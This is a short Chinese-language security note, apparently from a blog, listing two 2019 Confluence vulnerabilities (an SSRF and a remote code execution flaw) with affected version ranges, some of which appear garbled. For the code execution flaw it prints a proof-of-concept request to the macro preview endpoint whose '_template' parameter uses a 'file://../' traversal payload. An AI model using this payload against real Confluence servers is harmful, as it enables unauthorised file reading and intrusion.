zoukankan      html  css  js  c++  java

  • 应用安全

    CVE-2019-3395

    Date:
2019-04-09

类型:
SSRF

影响范围:
    • Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
    • Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
    • Confluence 6.6.* < 6.6.12
    • Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
    • Confluence 6.12.* < 6.12.3
    • Confluence 6.13.* < 6.13.3
    • Confluence 6.14.* < 6.14.2

    CVE-2019-3396

    Date:
2019-04-09

类型:
远程代码执行

    复现
    POC
    /rest/tinymce/1/macro/preview
    {"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","width":"300","height":"200","_template":"file://../"}}}

    影响范围:
    • Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
    • Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
    • Confluence 6.6.* < 6.6.12
    • Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
    • Confluence 6.12.* < 6.12.3
    • Confluence 6.13.* < 6.13.3
    • Confluence 6.14.* < 6.14.2                                                     
  • 相关阅读:
    新浪SAE搭建项目
    PHP ReflectionClass
    自定义时间函数
    mysql 日期函数
    jquery之商城菜单
    jquery之行自加自减
    前端之拖动面板
    商城轮播图
    js之返回网页顶部
    js之搜索框
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/11943078.html
Copyright © 2011-2022 走看看